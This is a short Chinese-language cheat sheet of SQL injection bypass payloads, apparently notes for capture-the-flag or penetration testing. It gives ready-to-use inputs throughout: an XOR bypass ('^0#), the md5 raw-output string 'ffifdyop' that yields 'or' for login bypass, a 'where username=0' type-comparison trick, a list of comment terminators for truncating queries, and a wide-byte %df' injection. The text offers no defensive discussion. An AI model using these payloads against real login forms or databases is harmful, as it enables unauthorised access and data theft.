异或绕过
异或绕过:1' or 1=1#
==> '^0#
md5绕过
md5绕过:ffifdyop
经md5摘要计算后为276f722736c95d99e921722cf9ed621c
,再转化成字符串为:'or'<
where username=0
sql进行字符串和数字比较时,会将字符串以类似于php的样子转化为数字,然后再进行比较,利用这点,就可以用where username=0
来查询首字符不含数字的username,可以用于只查询username不查询password(但是校验password)的登录
注释符
- //
- --+
- /**/
- #
- -- -
- ;
- %00
- --a
- --%0c--
- --%0e--
- %3c
<
information_schema被过滤
宽字符绕过
这种绕过可以用于前后端编码不一致的场景
宽字符绕过:1' or 1=1#
==>%df' or 1=1#